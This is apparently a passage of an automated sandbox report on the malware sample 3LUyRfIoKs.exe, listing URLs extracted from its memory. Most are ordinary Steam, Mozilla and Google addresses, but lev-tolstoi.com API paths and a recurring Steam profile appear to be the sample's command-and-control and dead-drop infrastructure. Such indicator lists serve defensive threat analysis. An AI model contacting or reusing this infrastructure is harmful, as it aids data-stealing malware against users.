                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2339617530.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/4
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268928606.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiX
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2294710528.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ta
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/li
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2265413562.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2353231737.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2265583119.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294656929.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298554589.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314592571.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recr
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
